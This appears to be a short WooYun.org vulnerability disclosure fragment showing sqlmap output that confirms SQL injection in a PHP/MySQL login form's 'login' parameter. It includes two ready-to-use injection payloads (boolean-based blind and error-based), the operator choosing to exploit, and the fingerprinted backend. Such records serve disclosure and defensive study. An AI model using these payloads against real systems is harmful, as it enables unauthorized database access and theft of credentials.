WooYun.org

Place: POST
Parameter: login
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: login=admin' RLIKE (SELECT (CASE WHEN (9690=9690) THEN 0x61646d696e ELSE 0x28 END)) AND 'RwrY'='RwrY&passwd=admin&strLanguage=zh&submitfrom=userweb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: login=admin' AND (SELECT 1542 FROM(SELECT COUNT(*),CONCAT(0x71696b6471,(SELECT (CASE WHEN (1542=1542) THEN 1 ELSE 0 END)),0x7168786371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rqcs'='rqcs&passwd=admin&strLanguage=zh&submitfrom=userweb
---
do you want to exploit this SQL injection? [Y/n] Y
[00:26:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0